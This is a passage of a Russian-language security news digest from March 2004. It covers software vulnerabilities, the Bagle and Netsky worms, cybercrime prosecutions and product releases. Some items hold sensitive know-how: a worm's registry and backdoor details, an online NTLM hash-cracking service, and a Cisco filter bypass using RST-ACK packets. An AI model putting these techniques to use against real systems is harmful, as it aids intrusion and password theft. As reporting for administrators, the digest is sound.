полумиллионе) образуют сеть, через которую и идет рассылка спама. До появления технологий, в принципе исключающих анонимные рассылки e-mail, выход из положения состоит в том, чтобы отслеживать сетевые адреса захваченных спамерами компьютеров. Публикация таких списков - действенный способ заставить пользователей избавиться от рассылающих спам вирусов (пребывание в списке "заразных" машин автоматически означает отказ почтовых служб от приема любой исходящей корреспонденции, и это серьезный стимул к "лечению"). "Черные списки" используемых спамерами адресов ведутся и сегодня, но негласно. В ближайшей же перспективе неизбежно либо превращение домашнего пользователя в самому себе системного администратора, либо быстрое развитие платных услуг по уходу за программным обеспечением домашних ПК.
Источник - http://www.finiz.ru

25/03/2004 13:10 Microsoft представила новую мобильную ОС.
Компания Microsoft представила новую версию операционной системы для мобильных устройств. Новая мобильная ОС, названная Windows Mobile 2003 Second Edition, включает ряд важных нововведений по сравнению с оригинальной системой, выпущенной летом прошлого года. Однако основа системы осталась по большей части прежней - об этом явно свидетельствует старое название с дополнением Second Edition на конце. Среди новых функций второй редакции Windows Mobile 2003 отмечаются поддержка расширенного ряда дисплеев разного типа. Теперь Windows Mobile лучше поддерживает экраны с VGA-разрешением (640 x 480 точек), экраны квадратной формы с разрешениями вроде 240 x 240 или 480 x 480 точек. Все это позволит использовать операционную систему в более широком спектре мобильных устройств самого разного назначения. Кроме поддержки большего числа разрешений, Windows Mobile 2003 SE позволяет динамически переключаться между портретным и альбомным режимом демонстрации изображения на экране. Наконец, в ОС появился режим, позволяющий "растянуть" на полный VGA-экран программы, рассчитанные на дисплеи со "старым" разрешением 320 x 240. Среди других нововведений в Windows Mobile 2003 SE стоит отметить мобильную версию технологии сглаживания шрифтов ClearType, новый вариант стартового меню, в котором демонстрируются значки недавно использованных программ. Среди более серьезных доработок стоит выделить поддержку протокола WPA для безопасного доступа к беспроводным сетям Wi-Fi и автоматическое переформатирование сложных веб-сайтов при открытии их в браузере Pocket Internet Explorer.
Подробности - http://www.microsoft.com/presspass/press/2004/mar04/03-24FutureOpportunitiesPR.asp

25/03/2004 13:29 Статья о сетевых атаках.
На сайте linuxfocus.org опубликована статья, являющаяся отличным переводом, выполненым Иваном Песиным со Львова, посвящённая обзору сетевых атак. Статья была опубликована в специальном выпуске Linux Magazine France, посвященном безопасности. Описывает различные типы внешних атак, которые могут применить злоумышленники в сети. Рассмотрены следующие типы атак: атаки, основанные на IP-фрагментации; подмена адреса источника (IP Spoofing); перехват TCP-сеанса (TCP Session Hijacking); подмена ARP-информации (ARP Spoofing); подмена DNS (DNS Spoofing); атаки на приложения. Рекомендуется к ознакомлению системным администраторам и специалистам по компьютерной безопасности.
Статья - http://www.linuxfocus.org/Russian/March2003/article282.shtml

25/03/2004 13:55 Онлайновый взломщик NTLM-хэшей.
Некий sarca анонсировал доступность в онлайне сайта, на котором можно расшифровать NTLM-хэш, сформированный ОС Windows NT/2000/XP/2003. Как пишет автор, в настоящий момент он располагает таблицей сформированых хэш-таблиц на 18 ГБ. Как написано на сайте, для декодирования применяется программа Rainbowcrack автора Zhu Shuanglei. Техника, применяемая для декодирования называется - rainbow tables technique. Таблицы представляют собой 30 файлов по 640 МБ каждый. Для расшифровки хэша необходимо ввести NT и LM-хэши и ввести адрес, на который будет выслан расшифрованный пароль.
Сайт - http://sarcaprj.wayreth.eu.org/

25/03/2004 14:17 Множественные уязвимости в Ethereal.
Как сообщает Stefan Esser из немецкой e-matters Security, обнаружены многочисленные уязвимости в разборщиках пакетов многих протоколов: BGP, EIGRP, IGAP, IRDA, ISUP, NetFlow, PGM, TCAP, UCP. Ethereal представляет собой популярный сниффер с GUI-интерфейсом. Присутствует во многих дистрибутивах Linux. Уязвимость позволяет удалённо либо выполнить произвольный код, вставив оный в прослушиваемый пакет, либо вызвать переполнение буфера с падением снифера. Общее количество уязвимостей поражает - их аж 13. Уязвимы версии 0.8.14 - 0.10.2. Выпущена обновлённая версия пакета - 0.10.3. Эксплоит не будет выпущен авторами в широкое использование.
Подробности - http://security.e-matters.de/advisories/032004.html

25/03/2004 15:25 Серьёзная уязвимость в dtlogin.
Dave Aitel из Immunity, Inc. сообщает о серьёзной уязвимости в приложении dtlogin, являющимся частью оконного интерфейса открытых систем (и закрытых тоже) под названием CDE (Common Desktop Environment). Уязвимость присутствует в механизме обработки входных данных при использовании протокола XDMCP (double-free weakness) и позволяет удалённо выполнить произвольный код от имени рута (!). В сообщение пишется, что уязвима ОС Solaris, однако в Linux уязвимости нет. При атаке используется удалённый порт 177/UDP. При этом не советуют обключать dtlogin, поскольку этой программой формируется графическое окно входа в систему. Подробное описание представлено в формате PDF.
Подробности - http://www.immunitysec.com/downloads/dtlogin.sxw.pdf

25/03/2004 15:43 Уязвимость в OpenBSD.
Букет уязвимостей пополнился уязвимостью в одной из самых надёжных ОС - OpenBSD. Уязвимость, которая обнаружена Rapid7, Inc., присутствует в демоне обработки протокола ISAKMP и позволяет удалённо вызвать отказ в обслуживании (DoS) из-за выхода за пределы памяти при выполнении операций чтения-записи и исчерпании системных ресурсов. Уязвимость была обнаружена в результате тестирования инструмента, выпускаемого Rapid7 под названием Striker ISAKMP Protocol Test Suite. Разработчики OpenBSD выпустили патчи и обновили репозитарий CVS.
Подробности - http://www.rapid7.com/advisories/R7-0018.html

25/03/2004 16:40 Уязвимость в ядре Solaris.
Продолжая свои исследования ОС Solaris, Immunity, Inc. обнаружила уязвимость в ядре популярной коммерческой ОС Solaris, наличие которой позволяет загружать в память модули ядра, не имея полномочий суперпользователя. Последствия подобной уязвимости очевидны. Подробное описание опять представлено в формате PDF.
Подробности - http://www.immunitysec.com/downloads/solaris_kernel_vfs.sxw.pdf

26/03/2004 10:50 Румыния готовится к суду над автором Blaster.f.
В Румынии начинается подготовка к судебному процессу по делу 24-летнего Дана Думитру Чиобану, арестованного в прошлом году по обвинению в создании версии "f" интернет-червя Blaster (Worm.Win32.Lovesan.a), сообщает Reuters. Несмотря на то, что Blaster.f никогда не рассматривался в качестве источника серьезной киберугрозы, в случае признания вины Чиобану, ему грозит лишение свободы на срок от 3 до 15 лет. Наказание по румынским меркам может оказаться более чем суровым. Например, срок лишения свободы за изнасилование в Румынии составляет около 7 лет. Вводя жесткие меры против киберпреступников, Румыния намеревается избавиться от репутации страны, которая дает прибежище целым преступным синдикатам, занимающимся онлайновыми правонарушениями. Суд над румынским вирусописателем, еще не начавшись, вновь привлек внимание международных экспертов к проблеме адекватных наказаний за киберпреступления. Особое внимание специалисты обращают на случаи, когда вредоносные программы пытаются квалифицировать как результат работы любопытных подростков. «Если юным программистам интересно, как работает такая программа, им следует полюбопытствовать и насчет юридических последствий таких деяний», - заметила заместитель министра связи Румынии Адриана Тичау. «Игра обернулась преступлением», - прокомментировал грядущий процесс адвокат Чиобану.
Источник - http://www.viruslist.ru

26/03/2004 11:17 Появление очередной версии червя Bagle.
"Лаборатория Касперского" предупреждает о появлении в интернете новой версии почтового червя Bagle - I-Worm.Bagle.s. Червь распространяется в качестве вложений в зараженные электронные письма. Письма Bagle.s не содержат ни темы, ни текста. Имя вложения - произвольное, расширение - "exe". Размер файла вложения около 8KB. Червь представляет собой PE EXE-файл. Червь упакован FSG, размер распакованного файла около 37KB. После запуска червь копирует себя в системный каталог Windows с именем "gigabit.exe" и регистрирует данный файл в ключе автозапуска системного реестра: [HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun] "gigabit.exe" = "%system%gigabit.exe". Также создает ключ: [SOFTWAREWindows2004] "gsed", где сохраняет свои переменные. При старте червь запускает игру The Microsoft Hearts Network (mshearts.exe). Червь ищет на диске файлы с определёнными расширениями и рассылает себя по всем найденных в них адресах электронной почты. Для отправки почты червь использует собственный SMTP-сервер. После этого открывает и затем отслеживает порт 4751. Функции "бэкдор" позволяют злоумышленнику осуществлять следующие операции: запуск команд, загрузка файлов.
Более подробно - http://www.viruslist.ru/viruslist.html?id=144869633

26/03/2004 11:33 Вышел официальный почтовый клиент для Palm OS 6.
Компании PalmSource и Visto Corporation сообщили о выходе почтового клиента для будущих ОС Palm OS Cobalt и Garnet. ПО Mobile Mail 5.0 станет стандартной почтовой программой для Palm-наладонников. К сожалению, Mobile Mail 5.0 нельзя будет купить или скачать и установить самостоятельно на существующие КПК класса Tungsten, не говоря уже о более ранних моделях. Программа будет поставляться предустановленной производителем на новых карманных компьютерах, сконструированных под Palm OS 6. Это первый случай в истории Palm, когда почтовое ПО входит в поставку Palm OS, ранее эти программы поставлялись отдельно. Работа с протоколом IMAP в Mobile Mail 5.0 усовершенствована, так что теперь пользователям доступны до 16 папок на почтовом сервере. Поддерживаются SSL и защищённая идентификация пользователей.
Подробности - http://www.visto.com/news/releases/20040322-MM5.html

26/03/2004 12:12 Семинар по информационной безопасности.
14-15 апреля в Санкт-Петербурге и 26-27 апреля в Москве пройдут двухдневные курсы по информационной безопасности "Практическое применение международного стандарта безопасности информационных систем компании ISO 17799 и анализ рисков информационных систем компаний", сообщает bugtraq.ru. Семинар организован компанией Digital Security, проводит его Илья Медведовский, эксперт по информационной безопасности, один из авторов "Атаки [через|на|из] Internet".
Подробности - http://www.dsec.ru/l_courses/schedule.php

26/03/2004 12:28 Предприятия Хабаровска понесли тысячные убытки от вмешательства 23-летнего хакера.
Три предприятия Хабаровска понесли тысячные убытки от вмешательства 23 летнего хакера, проживающего в селе Бычиха Хабаровского края. Несколько месяцев молодой человек пользовался Интернетом за счет других, сообщает корреспондент ИА REGNUM. "Про существование этого хакера я вообще не знал, - говорит директор ООО "Транстур" Александр Кезля. - Некоторое время назад наша фирма заключила с Хабаровской телефонно-телеграфной станцией договор о поставке Интернет услуг. Они нам дали пароли для выхода во "Всемирную паутину". Спустя месяц к нам пришли счета за пользование услугами. Причем среди них были незафиксированные нами выходы в глобальную сеть. Я написал заявление о незаконном использовании неизвестным человеком нашим Интернет-ресурсом. Через несколько месяцев сотрудники милиции нашли злоумышленника". По словам сотрудницы пресс-службы УВД по Хабаровскому краю Галины Орловой, им оказался нигде не работающий Булдыгеров, житель села Бычихи. Против него возбуждено несколько уголовных дел по статьям 183 и 165 УК РФ "Незаконное разглашение коммерческой тайны и причинение ущерба". В результате его противоправной деятельности пострадало три организации ФГУП "Дальавиа", "183 военно–картографическая фабрика" и ООО "Транстур". Как потом рассказал сам подозреваемый следователю, пароли для входа в Интернет предприятий ему обменял неизвестный человек еще летом, на прогулочном теплоходе за бутылку "Мартини".
Источник - http://www.crime-research.ru

26/03/2004 15:06 «Телефонный вирус»: очередная мистификация.
В последние дни в русском сегменте интернета поднялась волна слухов о так называемом «телефонном вирусе», якобы способном заражать сотовые телефоны, стирать их IMEI и IMSI, а также данные с SIM-карты пользователя. Загадочное «предупреждение» передается, в основном, посредством почтовых рассылок и содержит следующий текст (с незначительными вариациями, внесенными уже самими пользователями): "Телефонный вирус: Если вам позвонили и на дисплее вашего мобильного телефона высвечивается АСЕ-? , не отвечайте на этот звонок, сразу прекратите (выключайтесь). Если вы ответите на звонок, то ваш телефон будет заражен этим вирусом. Вирус сотрет всю информацию IMEI и IMSI с вашего телефона и с вашей SIM карточки, что сделает ваш телефон неспособным связываться с телефонной сетью. Вам придется покупать новый телефон. Эту информацию подтвердили фирмы Моторола и Нокиа. Уже 3 миллиона мобильных телефонов заражены этим вирусом в США. Эти сведения вы также можете проверить на сайте СNN. Пожалуйста, сообщите эту информацию всем друзьям". Эксперты «Лаборатории Касперского» рекомендуют всем получившим подобное письмо посетить сайты обозначенных в нём компаний - Nokia и Motorola - и попытаться найти там подтверждение приведенной в письме информации. Можно попытаться проделать то же самое и на сайте CNN. На данный момент эта мистификация вызвала лишь рост спамовых писем в ящиках пользователей интернета. Ни одного случая «заражения» сотовых телефонов этим «вирусом» «Лаборатория Касперского» не зафиксировала.
Источник - http://www.kaspersky.ru

26/03/2004 16:18 Фэйк-сайт газеты "Красная звезда".
Занятная стаья появилась на сайте, который известен своей скандальной известностью www.compromat.ru. Суть статьи сводится к тому, что в ряде воинских частей появились газеты "Красной звезды" со статьёй г-на (специально не раскрываю полный титул - ньюсмейкер) Иванова, являющегося нынешним министром Обороны нынешней полностью разваленной (не без его участия) армиии РФ. Суть этого интервью сводится к якобы необходимости более терпимого отношения к службе сексуальных меньшинств (геев) в этой самой армии. Из этого же номера газеты цитата - "Древние считали, что сильна та армия, в которой воины любят друг друга". Самое интересное тут заключается в том, что такой статьи в газете не было (как она появилась в частях - пусть разбираются доблестные органы контрразведки). Тем не менее в Интернете объявился фейк-сайт газеты "Красная звезда" по адресу www.redstar.su, который при проверке по IP-адресу оказался принадлежащим сети, не имеющей никакого отношения к стране под названием Российская Федерация, поскольку принадлежит сети Global Net Access, LLC, что в городе Атланта (штат Джорджия), США. Ничем иным, как информационной войной со стороны самого "миролюбивого" государства в мире подобный шаг назвать нельзя. Настоящий сайт газеты "Красная Звезда" находится по адресу www.redstar.ru.
Подробности - http://www.compromat.ru/main/ivanovserg/falsh.htm

27/03/2004 15:36 Таиланд выдает США украинского киберпирата.
Власти Таиланда приняли решение об экстрадиции в США жителя украинского города Тернополь Максима Ковальчука, подозреваемого в совершении ряда преступлений в сфере компьютерной безопасности. Общая сумма ущерба от незаконной деятельности Ковальчука оценивается в 3 миллиона долларов, отмечает Associated Press. Обвинения в нарушении авторских прав, торговле контрафактными товарами, отмывании денег и незаконном обладании информацией о чужих банковских картах были выдвинуты против Ковальчука в городе Сан-Хосе еще в 2000 году. 20 мая 2003 года 25-летний украинец был арестован в Бангкоке. По данным следствия, Ковальчук занимался продажей контрафактных копий программного обеспечения Microsoft, Autodesk, Adobe и Macromedia через различные интернет-ресурсы. В случае признания Ковальчука виновным в отмывании денег ему грозит тюремное заключение на срок до 20 лет и штраф в размере 500 тысяч долларов.
Источник - http://www.viruslist.ru

27/03/2004 16:33 Борьба с распространением MP3 в LiveJournal.
В последнее время из российского сегмента службы LiveJournal были удалены несколько сообществ, специализирующихся на размещении ссылок на музыкальные файлы в формате MP3. В частности, было удалено одно из самых популярных сообществ такого рода - ru_mp3. Организаторы ряда музыкальных сообществ, обмен ссылками для которых не является основной тематикой, получили от администрации LiveJournal официальные предупреждения, в которых говорилось о том, что размещение ссылок на нелицензионные музыкальные файлы является нарушением правил использования LiveJournal, а также законов США. За комментариями по данному вопросу "Компьюлента" обратилась к администрации LiveJournal, а также к организаторам сообщества clubmusic, которые также получили предупреждение о необходимости удалить все ссылки на нелицензионную музыку. Один из главным вопросов, возникающих при рассмотрении ситуации - это почему сообщества по обмену музыкой долгое время работали, как ни в чем не бывало, а затем стали исчезать одно за другим. По словам члена администрации LiveJournal Анатолия Воробья, все объясняется очень просто. Дело в том, что конфликтная комиссия (Abuse Team) LiveJournal только реагирует на жалобы о нарушении правил. "Какое-то сообщество может нарушать правила ЖЖ и месяц, и год, и два, и ничего не произойдёт, если никто не напишет письмо в Abuse Team и не пожалуется на нарушение правил", - подчеркнул Анатолий Воробей. Что касается одновременного закрытия ряда музыкальных сообществ, то это, по мнению Анатолия Воробья, может объясняться как случайными, так и целенаправленными действиями каких-либо лиц. Подозревать в "стукачестве" на сообщества RIAA или другие подобные организации, особых оснований нет, считает Анатолий Воробей. В свою очередь, создатели сообщества clubmusic Артем (psycholog) и Станислав (BaSStaS) считают, что жалобу в конфликтную комиссию ЖЖ мог отправить какой-нибудь законопослушный американский посетитель сообщества, который мог попасть на его страницу случайно, например, через поисковик.
Подробности - http://net.compulenta.ru/2004/3/26/45971/?ref=right

27/03/2004 16:57 Начинается бета-тестирование Kaspersky® Security для PDA 5.0 .
Новое поколение уникального средства информационной защиты для КПК входит в финальную стадию разработки. "Лаборатория Касперского" объявляет начало открытого бета-тестирования нового средства обеспечения безопасности, представляющего передовую серию разработок "Лаборатории Касперского" - Kaspersky® Security для PDA 5.0. Kaspersky Security для PDA представляет собой не имеющее аналогов сочетание средств защиты данных, хранимых на карманном переносном компьютере (КПК). Продукт обеспечивает комплексную антивирусную защиту КПК различных типов, работающих под управлением наиболее популярных операционных систем - Windows CE и Palm OS. Помимо этого, программный комплекс предоставляет пользователю возможность контроля доступа к хранимой информации. Антивирусная составляющая системы защиты КПК реализована на базе Антивируса Касперского, оптимизированной для использования в операционных средах Windows CE и Palm OS. Важным свойством пакета программ Kaspersky Security для PDA является функция шифрования данных, защищающая карманный компьютер от несанкционированного доступа к расположенной на нем информации. В среде Windows CE программа позволяет создавать секретные папки, вся информация в которых зашифрована, а доступ ограничен паролями. Для Palm OS данная функция реализована в виде режима блокирования всего КПК, при этом для перевода компьютера в рабочее состояние требуется ввод пароля. Одновременно с блокировкой производится шифрование данных, и поэтому, даже располагая содержимым памяти заблокированного КПК, злоумышленник не сможет извлечь нужную информацию без пароля.
Источник - http://www.kaspersky.ru

27/03/2004 18:01 Баллмер: Мы прозевали поиск.
Недостаточные инвестиции Microsoft в технологию интернет-поиска были непростительной ошибкой компании, но она работает над тем, чтобы наверстать упущенное, сказал CEO Стив Баллмер. «Говорят, что Microsoft успевает везде, но вот вам пример того, где мы не успели, — заявил Балмер в четверг, выступая перед аудиторией менеджеров по маркетингу и представителей СМИ на пятой ежегодной конференции Microsoft по рекламе в Редмонде. Затем, как энергичный футбольный тренер, воодушевляющий команду на вторую половину матча, Баллмер заверил, что Microsoft все еще в игре и намерена победить. «Вы увидите много красивой борьбы на этой арене», — с уверенностью заявил он, в сердцах бросив на пол указку. Microsoft с трудом протискивается на одну из самых оживленных территорий в вебе. Она упорно старается наверстать упущенное, но пока отстает: большинство результатов веб-поиска компании приносит ее главный конкурент Yahoo. А на этой неделе европейские антимонопольные власти потребовали от Microsoft внести существенные изменения в структуру своего ПО — этот шаг может помешать компании вводить в будущие версии операционной системы Windows новые функции, в том числе и поиск.
Подробности - http://zdnet.com.com/2100-1104_2-5179402.html

27/03/2004 18:26 Стартовал DBL на rejik.ru.
На сайте http://rejik.ru запущен в рабочем режиме DBL - Distributed Ban-List (Распределенный Бан-Лист). Люди, занимающиеся блокированием порнографии, баннеров и прочего барахла, обычно сталкиваются с дилеммой "где же нам взять бан-листы". Причем хочется, чтобы были они большие и правильные. К сожалению, идеал недостижим. Как правило, качество (отсутствие ошибок) бан-листа обратно пропорционально его размеру. Задача DBL - объединить усилия админов с целью получить большие и качественные бан-листы, cообщает linux.org.ru.
Подробности - http://www.rejik.ru/720/index.html

27/03/2004 19:05 "nthost.ru" (Москва) начинает проверять почту на вирусы и спам.
По сообщению компании "nthost.ru" (Москва) 26 марта 2004 г. в тестовом режиме, по всем тарифным планам windows и unix хостинга запущена услуга антивирусной и антиспамерской проверки почтовых сообщений с возможностью индивидуальной настройки. Все желающие клиенты могут активировать использование антиспам фильтров и антивирус в разделе почта панели управления аккаунтом. В тестовый период услуга предоставляется бесплатно. Также произведён ряд дополнительных настроек почтового сервера с целью уменьшения количества получаемого спама и вирусов.
Подробности - http://www.nthost.ru/

27/03/2004 20:16 ICQ-спам: стоит ли овчинка выделки?
ICQ-спам пока еще не стал столь же массовым явлением, как спам по e-mail. Тем не менее последнее время о нем говорят все чаще. На первый взгляд, как метод рассылка спама по ICQ «выигрывает» в сравнении с почтовым спамом. В «аське» наличествует возможность очень четкого таргетинга как по географии, так и по полу и возрасту – вся эта информация вносится самим пользователем при регистрации. С другой стороны, подобные сведения часто оказываются недостоверными. А сами спамеры не слишком озабочены вопросом таргетинга – он невыгоден с экономической точки зрения. К тому же, если, по оценкам Yahoo!, из 10 млн пользователей Интернета в России 90% работают с электронной почтой, то, согласно данным КОМКОНа, доля тех, кто использует ICQ, всего 21%. Невелика и стоимость услуги по распространению спама через ICQ. Сейчас на просторах Рунета можно найти предложения от $1 за рассылку 5 тыс. посланий. Во столько же обойдется отправка 10 тыс. писем. Сами спамеры декларируют отклик до 25%. Такая цифра выглядит вполне реально, если учесть, что рассылки, как правило, уходят только тем пользователям, которые находятся в режиме онлайн. При этом, по данным антиспамеров, отклик на e-mail подобного содержания составляет 1-3%. По всей вероятности, сказывается большое количество неиспользуемых адресов и работа спам-фильтров.
Подробнее - http://www.webinform.ru/analyst/877.html

27/03/2004 20:42 Безопасные сетевые устройства Symantec.
Компания Symantec представила новую серию сетевых шлюзов, которые, как она надеется, помогут ей привлечь больше клиентов из сферы малого бизнеса. «Мы предлагаем устройства обеспечения безопасности уже много лет, и нам удалось достичь некоторого прогресса, -- заявил Джордж Слаз, менеджер по продукции Symantec из Калифорнии. – У нас есть ряд предложений для крупных предприятий, однако, мы хотим работать и с малыми компаниями». Каждый из продуктов новой серии Gateway Security 300 будет поставляться с шестью интегрированными функций безопасности. Кроме того, линейка Gateway Security 300 дает пользователям возможность эксплуатировать безопасные точки беспроводного доступа в локальных сетях. В устройствах Symantec объединены firewall-защита, системы мониторинга и предотвращения вторжений, реализации корпоративных политик безопасности, антивирусной защиты, фильтрации контента, а также VPN-функции. Серия Gateway Security 300 включает в себя три модели: 320, 360 и 360R. Они призваны анализировать IP-пакеты и пункты их назначения в целях блокировки вредоносных данных, удаленной проверки компьютеров на наличие вирусов, а также автоматического обновления антивирусных программ Symantec. Каждое устройство имеет резервную функцию кабельного подключения к интернету в случае проблем с основным каналом широкополосного соединения. По словам Стива Ханта, аналитика фирмы Forrester Research, это оборудование хорошо тем, что «его достаточно просто подключить, и оно уже работает. Таким образом, теоретически, малое предприятие может купить это устройство и установить его, не прибегая для его установки к услугам системных интеграторов и не привлекая специалистов извне».
Источник - http://www.setevoi.ru/

28/03/2004 11:51 Опасность заражения червем Netsky продолжает возрастать.
Все свидетельствует о том, что создатели данного червя передали его код группе хакеров, что может привести к возникновению новой волны червей. Червь Netsky, наряду с Mydoom и Bagle, является одним из ведущих игроков кибер войны, которая стала причиной появления ряда вирусов и их версий, заполонивших Интернет более месяца тому назад. Оружием в этой битве являются вредоносные программы и их версии, наделенные своими создателями оскорбительными выражениями против друг друга. Однако, как только конфликт начал стихать, новое сообщение раскрыло намерения Netsky, как минимум, продолжать заражать компьютеры. Ниже приведен текст, скрытый в коде N версии Netsky:
<*>NetDy: Thanks to the S*k*y*N*e*t alias *N*e*t*S*k*y* crew for the sourcecode.
<*>NetDy: We have rewritten *N*e*t*S*k*y.
<*>NetDy: Thats a good tactic to detroy the bagle and mydoom worms.
<*>NetDy: Our group will continue the war.
<*>NetDy: Malware writers'End'comes true.
<*>NetDy: Our Social Engineering is the best *lol* (You have no virus symantec says!).
Поэтому, несмотря на то, что уже существует 16 различных версий Netsky, можно ожидать появления новых и более опасных последователей. По мнению Луиса Корронса (Luis Corrons), возглавляющего лабораторию PandaLabs, “Не стоит терять бдительность, новые версии могут появиться в любой момент. Тот факт, что это именно версии, усложняет ситуацию, поскольку обычно каждый червь является усовершенствованной моделью своего предшественника и способен нанести еще больший вред”.
Источник - http://www.viruslab.ru

28/03/2004 12:17 ISS выпустила новое ПО для Linux.
Internet Security Systems объявила о выходе версии системы обнаружения атак RealSecure Server для операционных систем Linux RedHat Professional 8 и 9 и Linux RedHat Enterprise 2.1 и 3.0. К ключевым особенностям новой версии относится независимость от ядра ОС, которая позволяет не переустанавливать сенсор в случае обновления ядра операционной системы Linux, которое меняется очень часто. Вторым отличием новой версии является возможность обнаружения атак в зашифрованном SSL-трафике для Apache 1.3.x и 2.x.
Источник - http://www.nixp.ru

28/03/2004 12:31 Российский 500 МГц процессор МЦСТ R500.
Выпущен новый отечественный микропроцессор МЦСТ R500, к производству которого приступило ЗАО "Эльбрус МЦСТ" (Elbrus MCST — Moscow Center of Sparc Technology, московский центр Sparc-технологий) под руководством Б.А.Бабаяна. На сайте iXBT представлены первые эксклюзивные фотографии этих процессоров, производство которых уже налажено в серийных масштабах. Речь идет о представителях семейства SPARC-совместимых процессоров серии "МЦСТ-R". Универсальные процессоры МЦСТ R-500 работают на тактовой частоте 450 МГц — 500 МГц, обладают энергопотреблением менее 2 Вт, состоят из 4,2 млн. транзисторов, изготавливаются с применением норм 0,13 мкм техпроцесса с 8 слоями металлизации. Площадь кристалла чипа составляет 20 мм², напряжение питания ядра — 1,2/3,3 В, заявленная производительность – порядка 400 MIPS, 170 MFLOPS. Процессоры выпускаются в 420-контактных корпусах BGA. Новые процессоры МЦСТ R-500 уже проверены в составе вычислительного комплекса "Эльбрус 90-микро" под управлением операционных систем Solaris, Linux и на большом комплексе прикладных задач.
Подробнее - http://ixbt.com/news/hard/index.shtml?hard103159id

28/03/2004 12:56 Израильские хакеры атаковали исламский портал.
дминистрация популярного исламского Интернет-портала в пятницу выступила с обвинительными заявлениями в адрес израильских хакеров. Якобы, последние атаковали сайт www.islamonline.net после того, как на нем вывесили материал, посвященный убитому главарю ХАМАСа шейху Ясину. Проблема, по словам Абделя Хади Абу Талеба, состояла в том, что материал о шейхе был недоступен в четверг в течение трех часов. Другой представитель редакции сайта Хуссамеддин Сайед сообщил в интервью агентству 'Франс-Пресс', что ранее от израильтян приходили сообщения угрожающего характера. Однако никаких конкретных подтверждений обвинительных заявлений редакция www.islamonline.net не предоставила. Означенный исламский портал был создан в 1999 году и базируется в Каире. Он предлагает информацию на арабском и английском языках, а также тексты фатв (религиозных предписаний), в том числе исходящие от популярного в мусульманском мире катарского клерика Юсефа аль-Карадави. Посещаемость сайта после ликвидации Ясина, как сообщается, резко возросла в несколько раз.
Источник - http://www.crime-research.ru

28/03/2004 13:09 Обход блокировок на CISCO роутере при сканировании сети.
Проблема жила достаточно долго, но только сейчас удалось найти причину, по которой пакеты от запрещенных адресов проникали в локальную сеть. Итак, есть роутер фирмы CISCO с "биосом" IOS (tm) 2500 Software (C2500-F2IN-L), Version 11.2(11), RELEASE SOFTWARE (fc1). Есть правила на роутере, которые запрещают извне приватные сети. "Нормальные" пакеты с этих сетей блокируются, но если послать пакет с флагами RST ASK, то такой пакет будет пропущен. Система автоматического обнаружения атак RealSecure такие пакеты идентифицирует как TCP_Probe_протокол. CheckPoint Firewall ругается "First packet isn't SYN tcp_flags: RST-ACK". Возможно, обновление IOS решит проблему, но новый IOS просто не влезет в устаревший роутер, а большинство компаний не согласится тратить деньги на замену железа. Следовательно, проблема защиты от сканирования сети у многих останется открытой.
Источник - http://www.bugtraq.ru

28/03/2004 15:27 Торгово-промышленная палата рассылает спам.
Во всем мире региональные Торгово-промышленные палаты являются объединением наиболее респектабельных коммерческих компаний. Быть членом ТПП престижно, а членство накладывает на компанию повышенные требования к соблюдению профессиональной этики и принятых обычаев делового оборота. Однако в России традиции деловой этики, судя по всему, еще не сформировались. Сегодня зарегистрирован случай рассылки спама от имени компании «Столичный стиль», которая учреждена Московской ТПП. Это беспрецедентный случай, который порочит репутацию не только названной фирмы, но и всего российского делового сообщества. О появлении спама от «Столичного стиля» сообщил Евгений Альтовский, координатор Рабочей группы Проекта «АнтиСпам». Он получил письмо с рекламой консультационного семинара. Кстати, возможно завтра мы опубликуем собственный комплейн о работе одного московского провайдера по предотвращению рассылки спама от имени одного из клиентов. В данный момент ожидается ответ на уже второе письмо с просьбой оградить нас от спама.
Подробнее - http://www.webplanet.ru/news/internet/2004/3/26/ttp_spam.html

28/03/2004 20:36 Обзор Windows Longhorn 4051.
На сайте, посвящённому непосредственно обзорам грядущей версии M$ Windows под названием Longhorn опубликован обзор билда 4051. 26 октября 2003 года этот билд, названный pre-beta 1 был представлен корпорацией Microsoft на конференции разработчиков. Этот билд является следующим после 4029, но в нем есть разительные отличия, что дает повод поговорить о некоей тендеции развития этой ОС. Система до сих пор не снабжена рабочей версией WinFS, скорее всего на начальном этапе разработчикам было дано распоряжение разработать интерфейс в первую очередь, чтобы представить его на вышеупомянутой конференции. Что они сделали очень неплохо, их усилия можно видеть на многочисленных скриншотах у нас в обзоре. Самый объемный раздел посвящен всему тому, что касается этого билда - от процесса установки, многочисленных скриншотов до характеристик работы отдельных фрагментов. Все это аккуратно разложено по разделам, в общей сложности Вас ждут 13 страниц, полных информацией, и 65 скриншотов. Желающие могут ознакомиться.
Обзор - http://longhorn.winall.ru/4051/



Программы дня за прошедшую неделю:

22/03/2004 Analog
Программа представляет логи веб-сервера в наглядной и легко читаемой форме. Работает очень быстро (обрабатывает 6 милионов строк логфайла за 35 минут на машине с прцессором 266MHz). Доступны исходники на С.
ОС: Cross-platform
Тип программы: HTTP

24/03/2004 Список служб в Windows XP
Хорошая подборка документации в CHM формате, содержащая подробную информацию о каждой из стандартных служб в Windows XP на русском языке.
ОС: All Win
Тип программы: Документация

27/03/2004 url2bmp
Полезная утилита, которая позволяет легко и быстро сделать скриншоты с веб-страниц любой длины, кроме этого есть возможность масштабирования полученного скриншота веб-страницы, результат работы программы может быть сохранен в одном из следующих графических форматов: BMP, PNG, Jpeg или Tiff. Отличительной особенностью этой программы от программ такого типа, является возможность использования командной строки.
ОС: All Win
Тип программы: HTTP


Архив рассылки новостей:
http://uinc.ru/news/archive/


На этом пока все.
Всем удачи.
uinC Team
http://uinc.ru

P.S. Все предложения, замечания и просьбы оставлять здесь:
http://uinc.ru/news/sendnews.php

Любые материалы с нашего сайта или рассылки не могут быть скопированы без разрешения автора или администрации сервера uinC.ru